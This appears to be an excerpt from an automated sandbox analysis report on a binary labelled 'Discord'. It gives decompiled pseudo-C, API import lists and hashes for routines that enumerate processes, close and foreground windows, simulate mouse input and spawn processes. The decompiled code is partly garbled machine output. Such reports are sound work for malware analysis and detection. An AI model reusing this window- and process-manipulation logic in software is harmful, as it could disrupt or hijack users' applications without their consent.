						} else {
							_t214 = _t213 - _t203;
							if(_t214 >> 2 != 0) {
								memmove(_t232, _t224, _t214);
								_t214 =  *0x6de9e7e8 - _t203;
							}
						}
						_t233 = _t232 + _t214;
						 *0x6de9e7e8 = _t233;
					}
					_t204 =  *0x6de9e7e4;
					if(_t204 != _t233) {
						do {
							_t239 =  *_t204;
							_t164 = IsWindow(_t239);
							_t248 = _t248 - 4;
							if(_t164 != 0) {
								_v704 = _t239;
								_v708 = _t239;
								L6DE8DCD8();
								_v708 = 0x32;
								_v692();
								_t248 = _t248 - 4;
								_v708 = _t239;
								_v712 = _t239;
								L6DE8DC68();
							}
							_t204 =  &(_t204[1]);
						} while (_t233 != _t204);
					}
				}
				_v708 = 0x3e8;
				_v692();
				_v712 = 0x6de9e8e4;
				L6DE8DD20();
				_v708 = 0;
				_v712 = 2;
				 *0x6de9e8e4 = 0;
				_t134 = CreateToolhelp32Snapshot(??, ??);
				 *0x6de9e8e4 = _t134;
				_t225 =  &_v372;
				_v716 = _t134;
				_v712 = _t225;
				_t135 = Process32First(??, ??);
				_t251 = _t248 - 0xfffffffffffffff4;
				if(_t135 == 0) {
					CloseHandle( *0x6de9e8e4);
					_t138 = 0;
					goto L17;
				} else {
					_t205 =  &_v672;
					while(1) {
						_v716 = _t205;
						_t140 = Process32First( *0x6de9e8e8);
						_t254 = _t251 - 8;
						if(_t140 == 0) {
							break;
						}
						_t238 = 0;
						do {
							_v720 = _t205;
							_v724 =  *0x6de9e8e8;
							_t238 =  ==  ? 1 : _t238;
							_t145 = Process32Next(??, ??);
							_t254 = _t254 - 8;
						} while (_t145 != 0);
						if(_t238 == 0 && strstr( &_v348,  *0x6de9e840) != 0) {
							_v724 = 1;
							_v728 = _v376;
							L6DE8DCD0();
						}
						_v724 = _t225;
						_t147 = Process32Next( *0x6de9e8e4);
						_t251 = _t254 - 8;
						if(_t147 != 0) {
							continue;
						} else {
							CloseHandle( *0x6de9e8e8);
							CloseHandle( *0x6de9e8e4);
							_v732 = 0x3e8;
							_v716();
							_t154 = IsWindow( *0x6de9e868);
							_t258 = _t251 - 0xfffffffffffffff8;
							if(_t154 != 0) {
								PostMessageA( *0x6de9e868, 0x10, 0, 0);
								_t258 = _t258 - 0x10;
							}
							_v736 = 0x3e8;
							_v720();
							_t156 =  *0x6de9e868;
							_v736 = _t156;
							 *(_t258 - 4) = _t156;
							L6DE8DC68();
							return 1;
						}
						goto L54;
					}
					CloseHandle( *0x6de9e8e8);
					_t138 = 0;
					L17:
					return _t138;
				}
				L54:
			}

0x6de8a212
0x6de8a218
0x6de8a221
0x6de8a22b
0x6de8a234
0x6de8a23c
0x6de8a244
0x6de8a24f
0x6de8a25b
0x6de8a26b
0x6de8a26f
0x6de8a275
0x6de8a27e
0x6de8a70f
0x6de8a711
0x6de8a719
0x6de8a71d
0x6de8a721
0x6de8a726
0x6de8a728
0x6de8a730
0x6de8a738
0x6de8a73c
0x6de8a73e
0x6de8a741
0x6de8a74a
0x6de8a74e
0x6de8a752
0x6de8a752
0x6de8a75d
0x6de8a76d
0x6de8a775
0x00000000
0x00000000
0x6de8a787
0x6de8a78a
0x6de8a78d
0x6de8a796
0x6de8a79a
0x6de8a79d
0x6de8a7a2
0x6de8a7a6
0x6de8a7ad
0x6de8a7b6
0x6de8a7ba
0x6de8a7bd
0x6de8a7c2
0x6de8a7c9
0x6de8a7d2
0x6de8a7d6
0x6de8a7d9
0x6de8a7de
0x6de8a7e5
0x6de8a7ee
0x6de8a7f2
0x6de8a7f5
0x6de8a7fa
0x6de8a801
0x6de8a811
0x6de8a815
0x6de8a818
0x6de8a81f
0x6de8a821
0x6de8a829
0x6de8a82c
0x6de8a830
0x6de8a833
0x6de8a833
0x6de8a284
0x6de8a289
0x6de8a289
0x6de8a28d
0x6de8a28d
0x6de8a294
0x6de8a29e
0x6de8a2a1
0x6de8a2b4
0x6de8a2c4
0x6de8a2c8
0x6de8a2ce
0x6de8a2dd
0x6de8a2e1
0x6de8a2e7
0x6de8a2eb
0x6de8a5d1
0x6de8a5d3
0x6de8a5db
0x6de8a5df
0x6de8a5e3
0x6de8a5e8
0x6de8a5ea
0x6de8a5f2
0x6de8a5fa
0x6de8a5fe
0x6de8a600
0x6de8a603
0x6de8a607
0x6de8a60b
0x6de8a60b
0x6de8a616
0x6de8a626
0x6de8a62e
0x00000000
0x00000000
0x6de8a640
0x6de8a643
0x6de8a646
0x6de8a64f
0x6de8a653
0x6de8a656
0x6de8a65b
0x6de8a65f
0x6de8a666
0x6de8a66f
0x6de8a673
0x6de8a676
0x6de8a67b
0x6de8a682
0x6de8a68b
0x6de8a68f
0x6de8a692
0x6de8a697
0x6de8a69e
0x6de8a6a7
0x6de8a6ab
0x6de8a6ae
0x6de8a6b3
0x6de8a6ba
0x6de8a6ca
0x6de8a6ce
0x6de8a6d1
0x6de8a6d8
0x6de8a6da
0x6de8a6e2
0x6de8a6e5
0x6de8a6e9
0x6de8a6ec
0x6de8a6ec
0x6de8a6fa
0x6de8a6fa
0x6de8a2f1
0x6de8a2f8
0x6de8a2fc
0x6de8a302
0x6de8a308
0x6de8a30d
0x6de8a311
0x6de8a316
0x6de8a4ea
0x6de8a8c5
0x6de8a8c7
0x6de8a4f0
0x6de8a4f0
0x6de8a503
0x6de8a50b
0x6de8a83c
0x6de8a83f
0x6de8a84b
0x6de8a852
0x6de8a858
0x6de8a85a
0x6de8a85d
0x6de8a85d
0x6de8a862
0x00000000
0x6de8a864
0x6de8a898
0x6de8a898
0x6de8a89a
0x6de8a89f
0x6de8a8a1
0x6de8a88c
0x6de8a88c
0x6de8a88e
0x6de8a891
0x6de8a891
0x6de8a896
0x6de8a872
0x6de8a872
0x6de8a872
0x6de8a875
0x6de8a878
0x6de8a878
0x6de8a87d
0x00000000
0x00000000
0x6de8a870
0x6de8a870
0x6de8a87f
0x6de8a882
0x6de8a886
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6de8a8a3
0x6de8a8a1
0x6de8a862
0x6de8a511
0x6de8a511
0x6de8a51d
0x6de8a51d
0x6de8a522
0x6de8a528
0x6de8a52d
0x6de8a52d
0x6de8a52f
0x6de8a53b
0x6de8a542
0x6de8a544
0x6de8a8d7
0x6de8a54a
0x6de8a54a
0x6de8a552
0x6de8a8d0
0x6de8a558
0x6de8a558
0x6de8a561
0x6de8a8b3
0x6de8a8be
0x6de8a8be
0x6de8a561
0x6de8a567
0x6de8a569
0x6de8a569
0x6de8a56f
0x6de8a577
0x6de8a590
0x6de8a590
0x6de8a595
0x6de8a597
0x6de8a59c
0x6de8a59e
0x6de8a5a2
0x6de8a5a5
0x6de8a5aa
0x6de8a5b1
0x6de8a5b5
0x6de8a5b8
0x6de8a5bc
0x6de8a5bf
0x6de8a5bf
0x6de8a585
0x6de8a588
0x6de8a590
0x6de8a577
0x6de8a31c
0x6de8a323
0x6de8a32a
0x6de8a331
0x6de8a336
0x6de8a33e
0x6de8a345
0x6de8a34f
0x6de8a357
0x6de8a35c
0x6de8a363
0x6de8a366
0x6de8a36a
0x6de8a36f
0x6de8a374
0x6de8a4db
0x6de8a4e1
0x00000000
0x6de8a37a
0x6de8a37a
0x6de8a383
0x6de8a388
0x6de8a38f
0x6de8a394
0x6de8a399
0x00000000
0x00000000
0x6de8a39f
0x6de8a3a1
0x6de8a3b1
0x6de8a3b5
0x6de8a3b8
0x6de8a3bb
0x6de8a3c0
0x6de8a3c3
0x6de8a3c9
0x6de8a3ee
0x6de8a3f6
0x6de8a3f9
0x6de8a3f9
0x6de8a403
0x6de8a40a
0x6de8a40f
0x6de8a414
0x00000000
0x6de8a41a
0x6de8a428
0x6de8a435
0x6de8a43a
0x6de8a441
0x6de8a450
0x6de8a456
0x6de8a45b
0x6de8a47d
0x6de8a483
0x6de8a483
0x6de8a486
0x6de8a48d
0x6de8a491
0x6de8a499
0x6de8a49d
0x6de8a4a0
0x6de8a4b4
0x6de8a4b4
0x00000000
0x6de8a414
0x6de8a4bd
0x6de8a4c3
0x6de8a4c8
0x6de8a4d2
0x6de8a4d2
0x00000000

APIs

ResetEvent.KERNEL32 ref: 6DE8A212
_ZdlPv.LIBSTDC++-6 ref: 6DE8A331
CreateToolhelp32Snapshot.KERNEL32 ref: 6DE8A34F
Process32First.KERNEL32 ref: 6DE8A36A
Process32First.KERNEL32 ref: 6DE8A38F
Process32Next.KERNEL32 ref: 6DE8A3BB
strstr.MSVCRT ref: 6DE8A3DE
_Z4TeyPmj.DFO1 ref: 6DE8A3F9
Process32Next.KERNEL32 ref: 6DE8A40A
CloseHandle.KERNEL32 ref: 6DE8A428
CloseHandle.KERNEL32 ref: 6DE8A435
IsWindow.USER32 ref: 6DE8A450
PostMessageA.USER32 ref: 6DE8A47D
_Z3CokP6HWND__S0_.DFO1 ref: 6DE8A4A0
CloseHandle.KERNEL32 ref: 6DE8A4BD
CloseHandle.KERNEL32 ref: 6DE8A4DB
_ZSt16__insertion_sortIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops15_Iter_less_iterEEvT_SB_T0_.DPUB1 ref: 6DE8A51D
_ZSt8__uniqueIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops19_Iter_equal_to_iterEET_SB_SB_T0_.DPUB1 ref: 6DE8A53B
IsWindow.USER32 ref: 6DE8A595
_Z4QuiPP6HWND__S0_.DFO1 ref: 6DE8A5A5
_Z3CokP6HWND__S0_.DFO1 ref: 6DE8A5BF
_ZSt9__find_ifIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops16_Iter_equals_valIKS3_EEET_SD_SD_T0_St26random_access_iterator_tag.DPUB1 ref: 6DE8A626
_Z21ForceForegroundWindowP6HWND__.DFO1 ref: 6DE8A646
_Z6FermeWP6HWND__S0_.DFO1 ref: 6DE8A656
_Z3CokP6HWND__S0_.DFO1 ref: 6DE8A676
_Z4QuiPP6HWND__S0_.DFO1 ref: 6DE8A692
_Z3CokP6HWND__S0_.DFO1 ref: 6DE8A6AE
_ZSt9__find_ifIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops16_Iter_equals_valIKS3_EEET_SD_SD_T0_St26random_access_iterator_tag.DPUB1 ref: 6DE8A76D
_Z21ForceForegroundWindowP6HWND__.DFO1 ref: 6DE8A78D
_Z6FermeWP6HWND__S0_.DFO1 ref: 6DE8A79D
_Z3CokP6HWND__S0_.DFO1 ref: 6DE8A7BD
_Z4QuiPP6HWND__S0_.DFO1 ref: 6DE8A7D9
_Z3CokP6HWND__S0_.DFO1 ref: 6DE8A7F5
_ZSt16__insertion_sortIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops15_Iter_less_iterEEvT_SB_T0_.DPUB1 ref: 6DE8A84B

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: N9__gnu_cxx17__normal_iteratorSt6vector$CloseHandleProcess32Window$FermeFirstForceForegroundIter_equals_valIter_less_iterNextS0_5__ops15_S0_5__ops16_St16__insertion_sortSt26random_access_iterator_tagSt9__find_if$CreateEventIter_equal_to_iterMessagePostResetS0_5__ops19_SnapshotSt8__uniqueToolhelp32strstr
String ID:
API String ID: 216814917-0
Opcode ID: 973f6077991a9b3978c4f8afdb53a545565c243a098b5664b8f5c29d1dcbcbc8
Instruction ID: a39e15f2dd09daadb9a780619eaf021964b0e93ccf68a0b937edea4a59b2d643
Opcode Fuzzy Hash: 973f6077991a9b3978c4f8afdb53a545565c243a098b5664b8f5c29d1dcbcbc8
Instruction Fuzzy Hash: 850206B090A7018FDB10EF79D18861EBBF0BB85704F15892EE998DB345EB749849CB53

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8C507 Relevance: 39.3, APIs: 26, Instructions: 252processCOMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 6DE8C54D
_ZdlPv.LIBSTDC++-6 ref: 6DE8C559
CreateToolhelp32Snapshot.KERNEL32 ref: 6DE8C577
EnumWindows.USER32 ref: 6DE8C59D
_ZNKSs4findEPKcjj.LIBSTDC++-6 ref: 6DE8C5D3
_ZNSsC1ERKSsjj.LIBSTDC++-6 ref: 6DE8C61F
_ZNSs4swapERSs.LIBSTDC++-6 ref: 6DE8C635
_ZNSsC1ERKSsjj.LIBSTDC++-6 ref: 6DE8C679
_ZNSs4swapERSs.LIBSTDC++-6 ref: 6DE8C694
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE8C6D8
_ZNSs7reserveEj.LIBSTDC++-6 ref: 6DE8C6F1
_ZNSs6appendEPKcj.LIBSTDC++-6 ref: 6DE8C70B
_ZNSs6appendERKSs.LIBSTDC++-6 ref: 6DE8C71D
_ZNSs6appendEPKcj.LIBSTDC++-6 ref: 6DE8C737
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE8C75F
_ZNSs6appendERKSs.LIBSTDC++-6 ref: 6DE8C770
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE8C798
_ZNSs6appendEPKcj.LIBSTDC++-6 ref: 6DE8C7B1
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE8C7D9
_ZNSs6appendERKSs.LIBSTDC++-6 ref: 6DE8C7E6
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE8C80E
_ZNSs6appendEPKcj.LIBSTDC++-6 ref: 6DE8C82A
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE8C84F
CreateProcessA.KERNEL32 ref: 6DE8C89F
EnumWindows.USER32 ref: 6DE8C937
_Z10Choixhndlev.DPUB1 ref: 6DE8C97D
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8C9EC
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8CA0C
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8CA2C
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8CA4C
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8CA6C
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8CA82
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8CA98
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000), ref: 6DE8CAB6
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000), ref: 6DE8CACB
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,00000000,?,?,?,00000000), ref: 6DE8CAD4
_ZSt24__throw_out_of_range_fmtPKcz.LIBSTDC++-6 ref: 6DE8CB13
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8CB26
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000), ref: 6DE8CB3B
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000), ref: 6DE8CB50
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000), ref: 6DE8CB65

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Rep10_Ss4_$M_destroySs6append$M_disposeS_constructSs12_$EnumWindows$CreateSs4swapSsjj$ChoixhndlevKcjjProcessResumeSnapshotSs4findSs7reserveSt24__throw_out_of_range_fmtToolhelp32Unwind_
String ID:
API String ID: 1981659826-0
Opcode ID: c478cdf8d9948528179228bf04449954ac6cb65eada87e3955293d1da72bfc18
Instruction ID: 09ba73fe59cbc18e6793120b6e87a9a069785999868d80d5d8c9edbdf2c8624b
Opcode Fuzzy Hash: c478cdf8d9948528179228bf04449954ac6cb65eada87e3955293d1da72bfc18
Instruction Fuzzy Hash: D7C148B490A7018FD710EF68C48875EBBF0FB85714F258A6ED5989B381EB349944CF82

Uniqueness

Uniqueness Score: -1.00%

Function 6DE82740 Relevance: 37.7, APIs: 25, Instructions: 181sleepstringCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 6DE82759
Sleep.KERNEL32 ref: 6DE8277A
SetWindowPos.USER32 ref: 6DE827E7
Sleep.KERNEL32 ref: 6DE827F7
GetWindowTextLengthA.USER32 ref: 6DE82804
_Znaj.LIBSTDC++-6 ref: 6DE82817
GetWindowTextA.USER32 ref: 6DE82832
strcmp.MSVCRT ref: 6DE82842
_Z6FermeWP6HWND__S0_.DFO1 ref: 6DE8285B
Sleep.KERNEL32 ref: 6DE82867
FindWindowA.USER32 ref: 6DE82877
_Z3CokP6HWND__S0_.DFO1 ref: 6DE82890
_ZdlPv.LIBSTDC++-6 ref: 6DE82898
GetWindowTextLengthA.USER32 ref: 6DE828AF
_Znaj.LIBSTDC++-6 ref: 6DE828BE
GetWindowTextA.USER32 ref: 6DE828D5
SetWindowPos.USER32 ref: 6DE82994
_Z21ForceForegroundWindowP6HWND__.DFO1 ref: 6DE829A5
Sleep.KERNEL32 ref: 6DE829BE
mouse_event.USER32 ref: 6DE829EA
Sleep.KERNEL32 ref: 6DE829FA
mouse_event.USER32 ref: 6DE82A26
Sleep.KERNEL32 ref: 6DE82A36
_ZdlPv.LIBSTDC++-6 ref: 6DE82A43
_ZdlPv.LIBSTDC++-6 ref: 6DE82A4B

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Window$Sleep$Text$LengthZnajmouse_event$FermeFindForceForegroundRectstrcmp
String ID:
API String ID: 3793084735-0
Opcode ID: a14aa562e11641651b60145462c5986522fa82d34062bd8d0cabc5a7f289717d
Instruction ID: d49f0e9d3d8835e3ed303d411fa103ba3f236303d5346aa9c1da40f75788c632
Opcode Fuzzy Hash: a14aa562e11641651b60145462c5986522fa82d34062bd8d0cabc5a7f289717d
Instruction Fuzzy Hash: 4081D4B44097019FDB10AF69C18831EBBF0FF89718F058A2EE8D89B251E7359545CB53

Uniqueness

Uniqueness Score: -1.00%

Function 00401179 Relevance: 18.2, APIs: 12, Instructions: 202
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E00401179() {
				void* _v16;
				signed int _v48;
				void* _v52;
				char _v96;
				void* _v112;
				void* _v113;
				signed int _v116;
				void* _v120;
				void* _v132;
				void* _v136;
				void* _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t46;
				signed int _t48;
				intOrPtr* _t54;
				_Unknown_base(*)()* _t56;
				signed char* _t60;
				signed int _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				signed int _t69;
				void* _t73;
				intOrPtr _t82;
				signed int _t83;
				signed int _t85;
				void* _t92;
				signed int _t93;
				struct _STARTUPINFOA* _t94;
				signed int _t98;
				signed int _t99;
				void* _t100;
				void* _t103;
				void* _t105;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t114;
				signed int _t118;
				void** _t119;

				while(1) {
					L1:
					_push(_t112);
					_t112 = _t114;
					_push(_t100);
					_push(_t105);
					_t94 =  &_v96;
					memset(_t94, 0, 0x11 << 2);
					_t46 = E00402638(0x30, _t81);
					_t48 =  &_v113 & 0xfffffff0;
					 *_t48 = 0xcccccccc;
					 *((intOrPtr*)(_t48 + 4)) = 0xcccccccc;
					 *((intOrPtr*)(_t48 + 8)) = 0xcccccccc;
					 *((intOrPtr*)(_t48 + 0xc)) = 0xcccccccc;
					 *((intOrPtr*)(_t48 + 0x10)) = 0xcccccccc;
					 *((intOrPtr*)(_t48 + 0x14)) = 0xcccccccc;
					 *((intOrPtr*)(_t48 + 0x18)) = 0xcccccccc;
					 *((intOrPtr*)(_t48 + 0x1c)) = 0xcccccccc;
					_t118 = _t114 - 0x0000007c + 0xc - _t46 & 0xfffffff0;
					if( *0x40604c != 0) {
						GetStartupInfoA(_t94);
						_t118 = _t118 - 4;
					}
					_t82 =  *((intOrPtr*)( *[fs:0x18] + 4));
					_t103 = Sleep;
					while(1) {
						asm("lock cmpxchg [0x4063fc], ebx");
						if(0 == 0) {
							break;
						}
						if(0 == _t82) {
							_t83 = 1;
							if( *0x406400 != 1) {
								L7:
								if( *0x406400 == 0) {
									 *0x406400 = 1;
									_v136 = 0x408018;
									_v140 = 0x40800c;
									L004026C8();
								} else {
									 *0x406004 = 1;
								}
								if( *0x406400 == 1) {
									goto L36;
								} else {
									goto L10;
								}
							} else {
								L35:
								_v140 = 0x1f;
								L004026C0();
								if( *0x406400 != 1) {
									L10:
									if(_t83 == 0) {
										goto L37;
									}
								} else {
									L36:
									_v136 = 0x408008;
									_v140 = 0x408000;
									L004026C8();
									 *0x406400 = 2;
									if(_t83 == 0) {
										L37:
										_t41 = _t83;
										_t83 =  *0x4063fc;
										 *0x4063fc = _t41;
									}
								}
							}
							L43:
						} else {
							Sleep(0x3e8);
							_t118 = _t118 - 4;
							continue;
						}
						L11:
						_t54 =  *0x404064; // 0x401660
						if(_t54 != 0) {
							_v132 = 0;
							_v136 = 2;
							_v140 = 0;
							 *_t54();
							_t118 = _t118 - 0xc;
						}
						E00401BC0(_t83, _t103, 0);
						_v140 = E00401800;
						_t56 = SetUnhandledExceptionFilter(??);
						_t119 = _t118 - 4;
						 *0x406058 = _t56;
						 *_t119 = 0x401000;
						E00401E60(E00402690());
						 *0x4063ec = 0x400000;
						_t60 =  *_acmdln;
						if(_acmdln != 0) {
							_t93 = 0;
							while(1) {
								_t98 =  *_t60 & 0x000000ff;
								if(_t98 <= 0x20) {
									goto L15;
								}
								L20:
								_t93 =  ==  ? _t93 ^ 0x00000001 : _t93;
								L18:
								_t60 =  &(_t60[1]);
								_t98 =  *_t60 & 0x000000ff;
								if(_t98 <= 0x20) {
									goto L15;
								}
								goto L24;
								L15:
								if(_t98 != 0) {
									if(_t93 == 0) {
										while(1) {
											_t60 =  &(_t60[1]);
											_t99 =  *_t60 & 0x000000ff;
											if(_t99 > 0x20) {
												goto L23;
											}
											if(_t99 != 0) {
												continue;
											}
											goto L23;
										}
									} else {
										_t93 = 1;
										goto L18;
									}
								}
								L23:
								 *0x4063e8 = _t60;
								goto L24;
							}
						}
						L24:
						_t81 =  *0x40604c;
						if( *0x40604c != 0) {
							_t77 =  !=  ? _v48 & 0x0000ffff : 0xa;
							 *0x403000 =  !=  ? _v48 & 0x0000ffff : 0xa;
						}
						_t61 =  *0x40601c;
						_v116 = _t61;
						_t62 = 4 + _t61 * 4;
						_v120 = _t62;
						 *_t119 = _t62;
						_t63 = malloc(??);
						_t100 =  *0x406018;
						_v112 = _t63;
						if(_t61 <= 0) {
							_t64 = 0;
						} else {
							_t85 = 0;
							_t111 = _t100;
							do {
								 *_t119 =  *(_t111 + _t85 * 4);
								_t25 = strlen(??) + 1; // 0x1
								_t100 = _t25;
								 *_t119 = _t100;
								_t73 = malloc(??);
								 *(_v112 + _t85 * 4) = _t73;
								_t92 =  *(_t111 + _t85 * 4);
								_t85 = _t85 + 1;
								_v136 = _t100;
								 *_t119 = _t73;
								_v140 = _t92;
								memcpy(??, ??, ??);
							} while (_t85 != _v116);
							_t64 = _v120 - 4;
						}
						_t109 = _v112;
						 *((intOrPtr*)(_t109 + _t64)) = 0;
						 *0x406018 = _t109;
						E00401EF0();
						 *__imp____initenv =  *0x406014;
						_v136 =  *0x406014;
						_v140 =  *0x406018;
						_t69 =  *0x40601c;
						 *_t119 = _t69;
						E004029F0();
						 *0x40600c = _t69;
						if( *0x406008 == 0) {
							 *_t119 = _t69;
							exit(??);
							_t105 = _t109;
							 *0x40604c = 1;
							E00401F10();
							_t114 = _t119 - 0xc + 0xc;
							goto L1;
						}
						if( *0x406004 == 0) {
							L004026B8();
							_t69 =  *0x40600c;
						}
						return _t69;
						goto L43;
					}
					_t83 = 0;
					if( *0x406400 == 1) {
						goto L35;
					} else {
						goto L7;
					}
					goto L11;
				}
			}

0x00401180
0x00401180
0x00401180
0x00401183
0x0040118a
0x0040118b
0x0040118c
0x00401195
0x00401199
0x004011a4
0x004011a7
0x004011ad
0x004011b4
0x004011bb
0x004011c2
0x004011c9
0x004011d0
0x004011d7
0x004011de
0x004011e9
0x00401473
0x00401479
0x00401479
0x004011f7
0x004011fa
0x00401216
0x00401218
0x00401222
0x00000000
0x00000000
0x00401204
0x00401415
0x0040141d
0x00401234
0x0040123b
0x00401481
0x0040148b
0x00401493
0x0040149a
0x00401241
0x00401241
0x00401241
0x00401253
0x00000000
0x00000000
0x00000000
0x00000000
0x00401423
0x00401423
0x00401423
0x0040142a
0x00401437
0x00401259
0x0040125b
0x00000000
0x00000000
0x0040143d
0x0040143d
0x0040143d
0x00401445
0x0040144c
0x00401453
0x0040145d
0x00401463
0x00401463
0x00401463
0x00401463
0x00401463
0x0040145d
0x00401437
0x00000000
0x0040120a
0x00401211
0x00401213
0x00000000
0x00401213
0x00401261
0x00401261
0x00401268
0x0040126a
0x00401272
0x0040127a
0x00401281
0x00401283
0x00401283
0x00401286
0x0040128b
0x00401292
0x00401298
0x0040129b
0x004012a0
0x004012ac
0x004012b6
0x004012c0
0x004012c4
0x004012c6
0x004012e0
0x004012e0
0x004012e6
0x00000000
0x00000000
0x004012e8
0x004012f0
0x004012dd
0x004012dd
0x004012e0
0x004012e6
0x00000000
0x00000000
0x00000000
0x004012d0
0x004012d2
0x004012d6
0x004012f9
0x004012f9
0x004012fc
0x00401302
0x00000000
0x00000000
0x004012f7
0x00000000
0x00000000
0x00000000
0x004012f7
0x004012d8
0x004012d8
0x00000000
0x004012d8
0x004012d6
0x00401304
0x00401304
0x00000000
0x00401304
0x004012e0
0x00401309
0x00401309
0x00401311
0x00401320
0x00401323
0x00401323
0x00401328
0x0040132d
0x00401332
0x00401339
0x0040133c
0x0040133f
0x00401346
0x0040134c
0x0040134f
0x004014a4
0x00401355
0x00401355
0x00401357
0x00401360
0x00401363
0x0040136b
0x0040136b
0x0040136e
0x00401371
0x00401379
0x0040137c
0x0040137f
0x00401382
0x00401386
0x00401389
0x0040138d
0x00401392
0x0040139a
0x0040139a
0x0040139d
0x004013a0
0x004013a7
0x004013ad
0x004013bd
0x004013c4
0x004013cd
0x004013d1
0x004013d6
0x004013d9
0x004013e6
0x004013eb
0x004014ab
0x004014b0
0x004014b5
0x004014c3
0x004014cd
0x004014d2
0x00000000
0x004014d2
0x004013f9
0x004013fb
0x00401400
0x00401400
0x0040140c
0x00000000
0x0040140c
0x00401229
0x0040122e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040122e

APIs

Sleep.KERNEL32 ref: 00401211
SetUnhandledExceptionFilter.KERNEL32 ref: 00401292
malloc.MSVCRT ref: 0040133F
strlen.MSVCRT ref: 00401366
malloc.MSVCRT ref: 00401371
memcpy.MSVCRT ref: 0040138D
GetStartupInfoA.KERNEL32 ref: 00401473

Memory Dump Source

